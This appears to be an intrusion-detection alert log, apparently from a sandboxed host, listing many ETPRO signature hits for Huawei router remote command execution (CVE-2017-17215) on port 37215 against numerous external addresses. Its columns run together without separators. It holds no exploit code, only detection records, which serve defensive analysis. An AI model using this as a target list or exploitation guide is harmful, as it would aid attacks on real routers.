                                                        06/13/24-21:33:04.993922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5757237215192.168.2.1441.98.242.2
                                                        06/13/24-21:33:13.214402TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5282437215192.168.2.1441.234.36.79
                                                        06/13/24-21:32:34.190957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4102037215192.168.2.1441.151.25.13
                                                        06/13/24-21:32:56.786656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5695237215192.168.2.1441.2.197.244
                                                        06/13/24-21:33:07.057334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3923437215192.168.2.14197.112.28.27
                                                        06/13/24-21:32:13.565829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5059037215192.168.2.14156.204.231.26
                                                        06/13/24-21:32:28.045500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4966437215192.168.2.14156.107.233.158
                                                        06/13/24-21:32:09.459991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5769837215192.168.2.1441.112.156.86
                                                        06/13/24-21:32:30.124746TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3398437215192.168.2.1441.19.94.44
                                                        06/13/24-21:32:23.832833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3869237215192.168.2.14156.62.161.243
                                                        06/13/24-21:32:52.669123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4244237215192.168.2.14156.236.245.78
                                                        06/13/24-21:32:17.678950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4082037215192.168.2.14156.180.49.48
                                                        06/13/24-21:33:13.229829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4066037215192.168.2.1441.140.91.69
                                                        06/13/24-21:32:09.436706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4346437215192.168.2.14156.95.138.31
                                                        06/13/24-21:32:30.115781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4484637215192.168.2.14156.245.58.96
                                                        06/13/24-21:33:00.888974TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4786237215192.168.2.14197.9.80.166
                                                        06/13/24-21:32:03.279007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5347637215192.168.2.14156.170.35.32
                                                        06/13/24-21:32:46.503562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4375437215192.168.2.14156.135.107.41
                                                        06/13/24-21:32:15.633237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4887637215192.168.2.14197.101.78.2
                                                        06/13/24-21:32:50.630904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3987437215192.168.2.14156.94.206.41
                                                        06/13/24-21:32:13.543408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4704037215192.168.2.14156.191.123.14
                                                        06/13/24-21:32:32.155350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3369037215192.168.2.14197.63.76.90
                                                        06/13/24-21:32:58.823970TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4483637215192.168.2.14197.46.12.5
                                                        06/13/24-21:33:04.993148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5445437215192.168.2.14197.47.248.10
                                                        06/13/24-21:32:19.752863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3597237215192.168.2.1441.118.34.34
                                                        06/13/24-21:32:34.213880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5959637215192.168.2.14156.114.228.220
                                                        06/13/24-21:32:54.726189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3744237215192.168.2.14197.6.188.115
                                                        06/13/24-21:32:15.632837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3425237215192.168.2.14197.35.158.215
                                                        06/13/24-21:32:25.991834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5355037215192.168.2.1441.83.138.200
                                                        06/13/24-21:32:40.372640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4351437215192.168.2.14197.78.2.92
                                                        06/13/24-21:31:59.177577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5475037215192.168.2.14156.146.188.155
                                                        06/13/24-21:33:15.253798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4642037215192.168.2.14197.61.181.77
                                                        06/13/24-21:33:11.158825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5978037215192.168.2.14197.79.180.182
                                                        06/13/24-21:33:17.307438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5342237215192.168.2.1441.90.14.215
                                                        06/13/24-21:33:04.990655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3813637215192.168.2.1441.243.33.136
                                                        06/13/24-21:33:02.913599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5381437215192.168.2.14197.210.78.42
                                                        06/13/24-21:32:44.453233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4077237215192.168.2.1441.173.129.244
                                                        06/13/24-21:31:57.132950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3877637215192.168.2.14156.53.227.174
                                                        06/13/24-21:33:09.090364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4118437215192.168.2.14197.17.202.10
                                                        06/13/24-21:33:02.913261TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5296637215192.168.2.14156.40.228.110
                                                        06/13/24-21:32:01.224632TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5879237215192.168.2.14197.193.22.49
                                                        06/13/24-21:33:07.059688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5564637215192.168.2.1441.32.139.222
                                                        06/13/24-21:33:09.106884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5060637215192.168.2.14197.233.122.61
                                                        06/13/24-21:32:21.784995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4756037215192.168.2.1441.244.239.201
                                                        06/13/24-21:33:17.306609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4147037215192.168.2.14197.159.69.220
                                                        06/13/24-21:32:52.680409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4939237215192.168.2.14156.249.242.201
                                                        06/13/24-21:33:07.060795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3711837215192.168.2.14156.240.193.52
                                                        06/13/24-21:32:03.276925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6091237215192.168.2.14156.200.130.213
                                                        06/13/24-21:32:42.407798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3989437215192.168.2.14197.48.12.212
                                                        06/13/24-21:32:44.452773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4921437215192.168.2.14156.85.21.215
                                                        06/13/24-21:31:59.176893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5722037215192.168.2.14156.219.224.72
                                                        06/13/24-21:32:25.969681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4354637215192.168.2.1441.13.223.71
                                                        06/13/24-21:32:19.728053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4026637215192.168.2.14156.5.255.178
                                                        06/13/24-21:32:38.302676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3452437215192.168.2.14197.66.4.28
                                                        06/13/24-21:32:19.730772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4873837215192.168.2.14197.16.171.126
                                                        06/13/24-21:32:36.246701TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3292237215192.168.2.1441.74.225.86
                                                        06/13/24-21:32:54.710068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4255037215192.168.2.14156.176.255.36
                                                        06/13/24-21:32:32.169662TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4324037215192.168.2.1441.206.110.43
                                                        06/13/24-21:32:54.725088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4398237215192.168.2.1441.20.49.174
                                                        06/13/24-21:33:05.013175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3800237215192.168.2.14156.33.230.138
                                                        06/13/24-21:32:48.555553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4893037215192.168.2.1441.1.53.67
                                                        06/13/24-21:32:56.785485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5866837215192.168.2.1441.102.241.148
                                                        06/13/24-21:32:15.604605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4558837215192.168.2.1441.53.214.109
                                                        06/13/24-21:33:02.908265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3924437215192.168.2.1441.185.166.178
                                                        06/13/24-21:32:15.632422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3305237215192.168.2.1441.37.216.218
                                                        06/13/24-21:32:28.027815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4197037215192.168.2.14156.156.238.168
                                                        06/13/24-21:32:09.456128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4189237215192.168.2.14197.138.248.157
                                                        06/13/24-21:32:11.507706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5998437215192.168.2.1441.161.215.81
                                                        06/13/24-21:32:56.756018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3724837215192.168.2.1441.28.235.188
                                                        06/13/24-21:32:05.349934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6097437215192.168.2.14197.98.169.4
                                                        06/13/24-21:33:00.886248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3861637215192.168.2.1441.73.207.190
                                                        06/13/24-21:33:02.913077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4913037215192.168.2.1441.33.1.47
                                                        06/13/24-21:33:11.176911TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4365237215192.168.2.14156.144.189.4
                                                        06/13/24-21:33:09.130443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5535437215192.168.2.14156.69.213.252
                                                        06/13/24-21:33:09.127919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4421837215192.168.2.1441.156.228.40
                                                        06/13/24-21:31:57.091397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3404037215192.168.2.1441.161.235.104
                                                        06/13/24-21:31:57.132332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6089437215192.168.2.14156.56.194.112
                                                        06/13/24-21:33:09.091128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4515637215192.168.2.14156.83.71.187
                                                        06/13/24-21:32:11.488340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3417837215192.168.2.14156.221.243.231
                                                        06/13/24-21:32:52.679907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3845837215192.168.2.14197.125.9.160
                                                        06/13/24-21:32:48.555411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3759637215192.168.2.14156.249.227.157
                                                        06/13/24-21:32:54.708302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5805837215192.168.2.14197.237.3.78
                                                        06/13/24-21:31:57.130292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4925037215192.168.2.14197.182.24.202
                                                        06/13/24-21:32:32.155252TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4332837215192.168.2.14197.1.182.230
                                                        06/13/24-21:33:05.014054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4164637215192.168.2.1441.18.230.106
                                                        06/13/24-21:32:15.631835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3740037215192.168.2.14156.108.51.42
                                                        06/13/24-21:32:09.452784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5098037215192.168.2.1441.228.149.56
                                                        06/13/24-21:32:34.192518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4470437215192.168.2.14197.109.204.197
                                                        06/13/24-21:32:13.568475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4103837215192.168.2.1441.117.195.8
                                                        06/13/24-21:32:19.750587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5008637215192.168.2.14197.125.216.233
                                                        06/13/24-21:32:58.821884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4328037215192.168.2.14197.152.212.17
                                                        06/13/24-21:32:15.604307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5941037215192.168.2.1441.177.45.15
                                                        06/13/24-21:33:02.936491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5499837215192.168.2.1441.95.147.97
                                                        06/13/24-21:33:07.057369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3818637215192.168.2.14156.116.57.109
                                                        06/13/24-21:32:38.317392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4119437215192.168.2.14156.25.156.23
                                                        06/13/24-21:33:13.211780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4169637215192.168.2.1441.208.246.85
                                                        06/13/24-21:32:07.404343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4842437215192.168.2.1441.141.234.51
                                                        06/13/24-21:32:44.478666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5454037215192.168.2.14156.193.109.60
                                                        06/13/24-21:32:38.300488TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3503237215192.168.2.14197.30.110.72
                                                        06/13/24-21:32:56.785953TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5339437215192.168.2.1441.77.242.102
                                                        06/13/24-21:32:07.402922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4439437215192.168.2.14197.4.241.236
                                                        06/13/24-21:33:00.884297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5937437215192.168.2.14197.222.133.198
                                                        06/13/24-21:32:30.098575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5515237215192.168.2.1441.243.196.128
                                                        06/13/24-21:33:15.252792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5850037215192.168.2.14156.214.249.48
                                                        06/13/24-21:32:19.753844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5550437215192.168.2.14197.194.199.44
                                                        06/13/24-21:32:07.401716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5408037215192.168.2.14197.255.106.184
                                                        06/13/24-21:32:01.224141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5336437215192.168.2.1441.161.11.142
                                                        06/13/24-21:32:13.546566TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5438437215192.168.2.14156.178.254.72
                                                        06/13/24-21:32:23.941525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5202837215192.168.2.14156.5.214.222
                                                        06/13/24-21:33:17.340220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3982037215192.168.2.14156.232.199.61
                                                        06/13/24-21:32:30.099035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5450437215192.168.2.14156.204.133.74
                                                        06/13/24-21:32:11.488118TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4212237215192.168.2.14156.32.202.36
                                                        06/13/24-21:32:07.403247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5923037215192.168.2.14197.59.157.75
                                                        06/13/24-21:32:30.096606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3838237215192.168.2.14156.156.71.26
                                                        06/13/24-21:32:50.613466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4518637215192.168.2.14156.20.81.196
                                                        06/13/24-21:32:34.213577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4935237215192.168.2.14197.217.51.139
                                                        06/13/24-21:32:36.264488TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3948237215192.168.2.14156.177.38.2
                                                        06/13/24-21:32:58.839525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3986637215192.168.2.14197.124.17.155
                                                        06/13/24-21:32:56.758806TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4847437215192.168.2.1441.166.101.153
                                                        06/13/24-21:33:09.109515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4423637215192.168.2.14197.118.6.37
                                                        06/13/24-21:33:07.038109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4537037215192.168.2.14156.58.188.40
                                                        06/13/24-21:32:17.671150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5144837215192.168.2.14156.123.62.171
                                                        06/13/24-21:33:07.060748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3907837215192.168.2.14156.146.226.33
                                                        06/13/24-21:32:44.477580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4133837215192.168.2.1441.35.131.127
                                                        06/13/24-21:32:07.417124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4480437215192.168.2.1441.105.253.90
                                                        06/13/24-21:32:17.696498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5228237215192.168.2.14197.143.102.156
                                                        06/13/24-21:32:15.607071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4030437215192.168.2.14156.157.93.200
                                                        06/13/24-21:32:42.405048TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3656837215192.168.2.1441.54.178.100
                                                        06/13/24-21:32:48.551461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5648437215192.168.2.1441.102.143.66
                                                        06/13/24-21:32:13.568246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3951237215192.168.2.14197.97.200.149
                                                        06/13/24-21:32:54.727269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5068637215192.168.2.14197.233.215.17
                                                        06/13/24-21:32:25.970762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3751437215192.168.2.14156.162.183.229
                                                        06/13/24-21:33:09.087500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4703237215192.168.2.14197.73.81.98
                                                        06/13/24-21:31:59.177430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3769237215192.168.2.14197.42.1.88
                                                        06/13/24-21:32:38.323344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4348037215192.168.2.14197.213.6.37
                                                        06/13/24-21:32:21.781920TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4712837215192.168.2.14156.62.131.20
                                                        06/13/24-21:32:28.048367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5541837215192.168.2.1441.160.239.68
                                                        06/13/24-21:32:30.093868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4932237215192.168.2.1441.234.162.17
                                                        06/13/24-21:33:00.868732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5180037215192.168.2.14197.151.251.167
                                                        06/13/24-21:32:19.731639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4927837215192.168.2.14156.226.225.181
                                                        06/13/24-21:32:23.942909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4571237215192.168.2.14197.185.21.175
                                                        06/13/24-21:32:54.708673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3649837215192.168.2.14156.101.90.113
                                                        06/13/24-21:32:52.669071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5809037215192.168.2.1441.10.182.75
                                                        06/13/24-21:32:11.486585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4198437215192.168.2.14197.130.38.40
                                                        06/13/24-21:32:50.609923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3397237215192.168.2.14156.69.4.8
                                                        06/13/24-21:32:56.782804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4476837215192.168.2.1441.88.202.119
                                                        06/13/24-21:32:42.423421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5752837215192.168.2.14156.190.56.89
                                                        06/13/24-21:32:34.197711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3619237215192.168.2.14156.186.204.84
                                                        06/13/24-21:32:38.323651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3315237215192.168.2.14197.187.106.148
                                                        06/13/24-21:32:58.843955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5326837215192.168.2.14156.4.100.25
                                                        06/13/24-21:33:05.016010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3734437215192.168.2.14197.20.147.226
                                                        06/13/24-21:32:07.419690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4686237215192.168.2.1441.20.111.189
                                                        06/13/24-21:32:09.458671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4249837215192.168.2.14197.194.244.222
                                                        06/13/24-21:32:44.474066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5150637215192.168.2.1441.92.132.174
                                                        06/13/24-21:32:36.262473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5249837215192.168.2.1441.61.8.118
                                                        06/13/24-21:32:13.543702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4997637215192.168.2.1441.90.74.87
                                                        06/13/24-21:33:15.252016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5688437215192.168.2.14156.38.115.64
                                                        06/13/24-21:32:11.506293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3625637215192.168.2.14197.27.110.82
                                                        06/13/24-21:32:38.298738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3808637215192.168.2.14197.109.236.98
                                                        06/13/24-21:32:15.635987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3297437215192.168.2.1441.37.67.199
                                                        06/13/24-21:32:44.454507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5537837215192.168.2.1441.247.244.230
                                                        06/13/24-21:33:17.310393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5220837215192.168.2.14197.140.205.165
                                                        06/13/24-21:32:15.636123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5950637215192.168.2.14156.62.32.122
                                                        06/13/24-21:32:56.756387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3785437215192.168.2.14156.144.129.136
                                                        06/13/24-21:32:38.318412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5377237215192.168.2.14197.164.22.196
                                                        06/13/24-21:32:44.474862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3604037215192.168.2.14197.34.234.153
                                                        06/13/24-21:32:30.076788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3591637215192.168.2.14156.9.181.133
                                                        06/13/24-21:32:52.659040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3825637215192.168.2.14156.31.253.239
                                                        06/13/24-21:32:56.758894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4525037215192.168.2.14197.21.249.246
                                                        06/13/24-21:32:07.416394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4991637215192.168.2.14197.26.2.191
                                                        06/13/24-21:32:17.674420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4955837215192.168.2.14197.26.107.149
                                                        06/13/24-21:32:56.757086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5172037215192.168.2.1441.99.129.130
                                                        06/13/24-21:31:57.093671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5039837215192.168.2.1441.116.113.130
                                                        06/13/24-21:32:32.167543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4859037215192.168.2.14197.224.2.47
                                                        06/13/24-21:32:13.547165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5690237215192.168.2.14156.178.176.18
                                                        06/13/24-21:32:21.803612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4930637215192.168.2.14156.13.22.65
                                                        06/13/24-21:32:01.224689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3862237215192.168.2.14156.229.51.209
                                                        06/13/24-21:33:15.254806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5370437215192.168.2.1441.203.210.198
                                                        06/13/24-21:32:32.154245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3356637215192.168.2.14156.210.177.64
                                                        06/13/24-21:33:09.089894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5652837215192.168.2.1441.175.163.218
                                                        06/13/24-21:32:05.376711TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4933837215192.168.2.14156.6.144.224
                                                        06/13/24-21:33:07.039171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3670637215192.168.2.1441.166.158.235
                                                        06/13/24-21:32:05.346374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5207237215192.168.2.1441.192.17.185
                                                        06/13/24-21:32:52.656490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4798037215192.168.2.14156.42.241.213
                                                        06/13/24-21:32:52.680528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4205837215192.168.2.1441.171.49.228
                                                        06/13/24-21:32:25.969269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3663437215192.168.2.1441.41.25.153
